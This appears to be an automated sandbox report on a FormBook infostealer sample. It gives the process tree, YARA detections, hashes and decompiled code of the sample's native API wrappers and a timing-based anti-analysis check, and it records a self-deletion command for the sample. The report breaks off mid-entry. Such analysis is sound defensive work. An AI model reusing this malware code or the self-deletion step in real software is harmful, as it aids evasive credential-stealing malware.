JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.283263107.0000000000300000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.283263107.0000000000300000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.283263107.0000000000300000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.283263107.0000000000300000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.283263107.0000000000300000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: explorer.exePID: 3320, Parent PID: 5492

General

Target ID:	1
Start time:	09:11:49
Start date:	20/03/2023
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff75ed40000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Formbook_772cc62d, Description: unknown, Source: 00000001.00000002.514186613.00000000047C0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.523897898.00000000137CF000.00000004.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.523897898.00000000137CF000.00000004.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.523897898.00000000137CF000.00000004.80000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.523897898.00000000137CF000.00000004.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.523897898.00000000137CF000.00000004.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: help.exePID: 1068, Parent PID: 3320

General

Target ID:	2
Start time:	09:12:00
Start date:	20/03/2023
Path:	C:\Windows\SysWOW64\help.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\help.exe
Imagebase:	0xb50000
File size:	10240 bytes
MD5 hash:	09A715036F14D3632AD03B52D1DA6BFF
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.510580627.00000000031DD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.510580627.00000000031DD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.510580627.00000000031DD000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.510580627.00000000031DD000.00000004.00000020.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.510580627.00000000031DD000.00000004.00000020.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.510495926.0000000002DC0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.510495926.0000000002DC0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.510495926.0000000002DC0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.510495926.0000000002DC0000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.510495926.0000000002DC0000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.509959112.0000000000BD0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.509959112.0000000000BD0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.509959112.0000000000BD0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.509959112.0000000000BD0000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.509959112.0000000000BD0000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.512081375.0000000003CCF000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.512081375.0000000003CCF000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.512081375.0000000003CCF000.00000004.10000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.512081375.0000000003CCF000.00000004.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.512081375.0000000003CCF000.00000004.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.510213713.0000000002CC0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.510213713.0000000002CC0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.510213713.0000000002CC0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.510213713.0000000002CC0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.510213713.0000000002CC0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 5212, Parent PID: 1068

General

Target ID:	3
Start time:	09:12:07
Start date:	20/03/2023
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c del "C:\Users\user\Desktop\S22Ls0H4Sz.exe"
Imagebase:	0xa60000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 6076, Parent PID: 5212

General

Target ID:	5
Start time:	09:12:07
Start date:	20/03/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6edaf0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: S22Ls0H4Sz.exePID: 5492, Parent PID: 3320COMMON

Execution Graph

Execution Coverage:	7.8%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	1.1%
Total number of Nodes:	1869
Total number of Limit Nodes:	120

Executed Functions

Function 0039A400 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 37%

			E0039A400(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, char _a40) {
				intOrPtr _t16;
				void* _t18;
				intOrPtr _t21;
				intOrPtr _t25;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E0039AF50(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t4 =  &_a40; // 0x394a21
				_t6 =  &_a32; // 0x394d62
				_t16 = _a24;
				_t21 = _a20;
				_t25 = _a16;
				_t12 =  &_a8; // 0x394d62
				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _t25, _t21, _t16, _a28,  *_t6, _a36,  *_t4); // executed
				return _t18;
			}

0x0039a403
0x0039a40f
0x0039a417
0x0039a41c
0x0039a422
0x0039a42d
0x0039a431
0x0039a435
0x0039a43d
0x0039a445
0x0039a449

APIs

NtReadFile.NTDLL(bM9,5EB65239,FFFFFFFF,?,?,?,bM9,?,!J9,FFFFFFFF,5EB65239,00394D62,?,00000000), ref: 0039A445

Strings

!J9, xrefs: 0039A41C, 0039A428
bM9, xrefs: 0039A422, 0039A430
bM9, xrefs: 0039A43D, 0039A444

Memory Dump Source

Source File: 00000000.00000002.283734451.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.283724906.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.283916547.000000000039F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.283927910.00000000003A0000.00000020.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_S22Ls0H4Sz.jbxd

Yara matches

Similarity

API ID: FileRead
String ID: !J9$bM9$bM9
API String ID: 2738559852-665611353
Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction ID: df5e2c451d95a055af69c24c749c64e5c70e0c90b66328c76118250a6084b5e0
Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction Fuzzy Hash: 7BF0B7B2200208AFCB14DF89DC81EEB77ADEF8C754F158248BE1D97241D630E811CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0039A44A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 35
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtReadFile.NTDLL(bM9,5EB65239,FFFFFFFF,?,?,?,bM9,?,!J9,FFFFFFFF,5EB65239,00394D62,?,00000000), ref: 0039A445

Strings

bM9, xrefs: 0039A43D, 0039A444

Memory Dump Source

Source File: 00000000.00000002.283734451.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.283724906.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.283916547.000000000039F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.283927910.00000000003A0000.00000020.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_S22Ls0H4Sz.jbxd

Yara matches

Similarity

API ID: FileRead
String ID: bM9
API String ID: 2738559852-2931851036
Opcode ID: e8025a22b873f44e3f034a7fe280a81c12f1319611fdee8162e5b0f901dcc224
Instruction ID: 431e4dcf8082dfdbdcf6f92ca2c5a6f1d40d456a5d88c4a1337536664d257a11
Opcode Fuzzy Hash: e8025a22b873f44e3f034a7fe280a81c12f1319611fdee8162e5b0f901dcc224
Instruction Fuzzy Hash: CBF01CB62402146BDB14EFA9DC94EA7B3ACEF88760F058959FA1C97241C531E90087A0

Uniqueness

Uniqueness Score: -1.00%

Function 0038ACE0 Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0038ACE0(void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_v8 =  &_v536;
				_t15 = E0039CC40( &_v12, 0x104, _a8);
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_t17 = E0039D060(__eflags, _v8);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0039D2E0( &_v12, 0);
						_t32 = _t32 + 8;
					}
					_t18 = E0039B490(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}

0x0038acfc
0x0038acff
0x0038ad04
0x0038ad09
0x0038ad13
0x0038ad18
0x0038ad1b
0x0038ad1d
0x0038ad25
0x0038ad2a
0x0038ad2a
0x0038ad31
0x0038ad39
0x0038ad3c
0x0038ad3e
0x0038ad52
0x00000000
0x0038ad54
0x0038ad5a
0x0038ad0e
0x0038ad0e
0x0038ad0e

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0038AD52

Memory Dump Source

Source File: 00000000.00000002.283734451.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.283724906.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.283916547.000000000039F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.283927910.00000000003A0000.00000020.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_S22Ls0H4Sz.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
Instruction ID: 1e10a7d68ec37dd2cc8f6212697097e4a81116025da038ce6b28eafcaf2848df
Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
Instruction Fuzzy Hash: 6A0171B5D4020DABDF10EBE4DD42FDDB3789B14308F0041A5E9089B241F670EB18CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0039A34A Relevance: 1.5, APIs: 1, Instructions: 41
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E0039A34A(void* __esi, intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t23;
				void* _t34;
				signed int _t41;

				 *(__esi - 0x74aa33d5) =  *(__esi - 0x74aa33d5) & _t41;
				_t17 = _a4;
				_push(__esi);
				_t5 = _t17 + 0xc40; // 0xc40
				E0039AF50(_t34, _a4, _t5,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t23 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t23;
			}

0x0039a34c
0x0039a353
0x0039a359
0x0039a35f
0x0039a367
0x0039a39d
0x0039a3a1

APIs

NtCreateFile.NTDLL(00000060,00389CE3,?,00394BA7,00389CE3,FFFFFFFF,?,?,FFFFFFFF,00389CE3,00394BA7,?,00389CE3,00000060,00000000,00000000), ref: 0039A39D

Memory Dump Source

Source File: 00000000.00000002.283734451.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.283724906.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.283916547.000000000039F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.283927910.00000000003A0000.00000020.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_S22Ls0H4Sz.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 0b9140038fb50e217118b7360b882c107a71e661250b2a42a44d2c7968539bc5
Instruction ID: f5715b5a96df7eb4482c36df335b028b52abb0e68cbbd34aea3b838f3c37680f
Opcode Fuzzy Hash: 0b9140038fb50e217118b7360b882c107a71e661250b2a42a44d2c7968539bc5
Instruction Fuzzy Hash: 6C01ABB2601508AFDB08CF88DC95EEB77A9AF8C354F158648FA1D97240CA30E8118BA0

Uniqueness

Uniqueness Score: -1.00%

Function 0039A350 Relevance: 1.5, APIs: 1, Instructions: 40
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0039A350(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				_t3 = _a4 + 0xc40; // 0xc40
				E0039AF50(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}

0x0039a35f
0x0039a367
0x0039a39d
0x0039a3a1

APIs

NtCreateFile.NTDLL(00000060,00389CE3,?,00394BA7,00389CE3,FFFFFFFF,?,?,FFFFFFFF,00389CE3,00394BA7,?,00389CE3,00000060,00000000,00000000), ref: 0039A39D

Memory Dump Source

Source File: 00000000.00000002.283734451.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.283724906.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.283916547.000000000039F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.283927910.00000000003A0000.00000020.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_S22Ls0H4Sz.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction ID: fe4f6d914fdade86bb29c7b30278f97c5808b37289dfb7831a3e62aeefb75fdc
Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction Fuzzy Hash: 10F0BDB2200208AFCB08CF88DC85EEB77ADAF8C754F158248BA1D97241C630E8118BA4

Uniqueness

Uniqueness Score: -1.00%

Function 0039A530 Relevance: 1.5, APIs: 1, Instructions: 30
memorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0039A530(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				_t3 = _a4 + 0xc60; // 0xca0
				E0039AF50(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}

0x0039a53f
0x0039a547
0x0039a569
0x0039a56d

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0039B124,?,00000000,?,00003000,00000040,00000000,00000000,00389CE3), ref: 0039A569

Memory Dump Source

Source File: 00000000.00000002.283734451.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.283724906.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.283916547.000000000039F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.283927910.00000000003A0000.00000020.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_S22Ls0H4Sz.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction ID: 5ea3e5ae9ccac237e1e3ceffd977f63cf2f61c9ab25646ed6de16673e3a9067e
Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction Fuzzy Hash: 3EF015B2200208AFCB14DF89CC81EAB77ADAF88754F118248BE1D97241C630F810CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 0039A47A Relevance: 1.5, APIs: 1, Instructions: 23
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E0039A47A(intOrPtr _a8, void* _a12) {
				void* _v117;
				long _t9;
				void* _t14;

				asm("sbb edi, [ebx]");
				_t6 = _a8;
				_t3 = _t6 + 0x10; // 0x300
				_t4 = _t6 + 0xc50; // 0x38a933
				E0039AF50(_t14, _a8, _t4,  *_t3, 0, 0x2c);
				_t9 = NtClose(_a12); // executed
				return _t9;
			}

0x0039a47b
0x0039a483
0x0039a486
0x0039a48f
0x0039a497
0x0039a4a5
0x0039a4a9

APIs

NtClose.NTDLL(00394D40,?,?,00394D40,00389CE3,FFFFFFFF), ref: 0039A4A5

Memory Dump Source

Source File: 00000000.00000002.283734451.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.283724906.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.283916547.000000000039F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.283927910.00000000003A0000.00000020.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_S22Ls0H4Sz.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: c50802a4f6446ea83c9a177f86bb7d3df0e22652f8a72a5254dc4f60f81f27af
Instruction ID: 9265aeacfb2ada51ac33217d69562fec9294723711a3bf0c1469fd30f0bf7369
Opcode Fuzzy Hash: c50802a4f6446ea83c9a177f86bb7d3df0e22652f8a72a5254dc4f60f81f27af
Instruction Fuzzy Hash: 0DE08C76200514AFDB20DFA8CC86EEB7B69EF49350F154199FA9DAB342C630A505CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 0039A480 Relevance: 1.5, APIs: 1, Instructions: 20
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0039A480(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x38a933
				E0039AF50(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}

0x0039a483
0x0039a486
0x0039a48f
0x0039a497
0x0039a4a5
0x0039a4a9

APIs

NtClose.NTDLL(00394D40,?,?,00394D40,00389CE3,FFFFFFFF), ref: 0039A4A5

Memory Dump Source

Source File: 00000000.00000002.283734451.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.283724906.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.283916547.000000000039F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.283927910.00000000003A0000.00000020.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_S22Ls0H4Sz.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction ID: e5e08124ce8352d6122502751bdcd59795e5c84835fd9a9bc716a9c23b2673a8
Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction Fuzzy Hash: B4D01776200214ABDB10EB98CC85EA77BACEF48760F154599BA1D9B242C530FA0086E0

Uniqueness

Uniqueness Score: -1.00%

Function 00389AA0 Relevance: .1, Instructions: 92
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E00389AA0(intOrPtr* _a4) {
				intOrPtr _v8;
				char _v24;
				char _v284;
				char _v804;
				char _v840;
				void* _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t39;
				void* _t50;
				intOrPtr* _t52;
				void* _t53;
				void* _t54;
				void* _t55;
				void* _t56;

				_t52 = _a4;
				_t39 = 0; // executed
				_t24 = E00387EA0(_t52,  &_v24); // executed
				_t54 = _t53 + 8;
				if(_t24 != 0) {
					E003880B0( &_v24,  &_v840);
					_t55 = _t54 + 8;
					do {
						E0039BE00( &_v284, 0x104);
						E0039C470( &_v284,  &_v804);
						_t56 = _t55 + 0x10;
						_t50 = 0x4f;
						while(1) {
							_t31 = E00394DE0(E00394D80(_t52, _t50),  &_v284);
							_t56 = _t56 + 0x10;
							if(_t31 != 0) {
								break;
							}
							_t50 = _t50 + 1;
							if(_t50 <= 0x62) {
								continue;
							} else {
							}
							goto L8;
						}
						_t9 = _t52 + 0x14; // 0xffffe055
						 *(_t52 + 0x474) =  *(_t52 + 0x474) ^  *_t9;
						_t39 = 1;
						L8:
						_t33 = E003880E0( &_v24,  &_v840);
						_t55 = _t56 + 8;
					} while (_t33 != 0 && _t39 == 0);
					_t34 = E00388160(_t52,  &_v24); // executed
					if(_t39 == 0) {
						asm("rdtsc");
						asm("rdtsc");
						_v8 = _t34 - 0 + _t34;
						 *((intOrPtr*)(_t52 + 0x55c)) =  *((intOrPtr*)(_t52 + 0x55c)) + 0xffffffba;
					}
					 *((intOrPtr*)(_t52 + 0x31)) =  *((intOrPtr*)(_t52 + 0x31)) + _t39;
					_t20 = _t52 + 0x31; // 0x5608758b
					 *((intOrPtr*)(_t52 + 0x32)) =  *((intOrPtr*)(_t52 + 0x32)) +  *_t20 + 1;
					return 1;
				} else {
					return _t24;
				}
			}

0x00389aab
0x00389ab3
0x00389ab5
0x00389aba
0x00389abf
0x00389ad2
0x00389ad7
0x00389ae0
0x00389aec
0x00389aff
0x00389b04
0x00389b07
0x00389b10
0x00389b22
0x00389b27
0x00389b2c
0x00000000
0x00000000
0x00389b2e
0x00389b32
0x00000000
0x00000000
0x00389b34
0x00000000
0x00389b32
0x00389b36
0x00389b39
0x00389b3f
0x00389b41
0x00389b4c
0x00389b51
0x00389b54
0x00389b61
0x00389b6c
0x00389b6e
0x00389b74
0x00389b78
0x00389b7b
0x00389b7b
0x00389b82
0x00389b85
0x00389b8a
0x00389b97
0x00389ac6
0x00389ac6
0x00389ac6

Memory Dump Source

Source File: 00000000.00000002.283734451.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.283724906.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.283916547.000000000039F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.283927910.00000000003A0000.00000020.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_S22Ls0H4Sz.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9835c872434805b420af9e009800db09fa022f69ef5fa6a2d6e4e63ee433b124
Instruction ID: 849649d89e001f4b4e7c1eb905cbf01264d12a1854954f447053fb66e89bfc4a
Opcode Fuzzy Hash: 9835c872434805b420af9e009800db09fa022f69ef5fa6a2d6e4e63ee433b124
Instruction Fuzzy Hash: EE21F8B2D443185BCB27E664AD52BFF73ACAB54304F4800EEE94997142F634AA0987A1

Uniqueness

Uniqueness Score: -1.00%

Function 0039A620 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0039A620(intOrPtr _a4, char _a8, long _a12, long _a16) {
				void* _t10;
				void* _t15;

				E0039AF50(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t6 =  &_a8; // 0x394526
				_t10 = RtlAllocateHeap( *_t6, _a12, _a16); // executed
				return _t10;
			}

0x0039a637
0x0039a642
0x0039a64d
0x0039a651

APIs

RtlAllocateHeap.NTDLL(&E9,?,00394C9F,00394C9F,?,00394526,?,?,?,?,?,00000000,00389CE3,?), ref: 0039A64D

Strings

&E9, xrefs: 0039A642, 0039A64C

Memory Dump Source

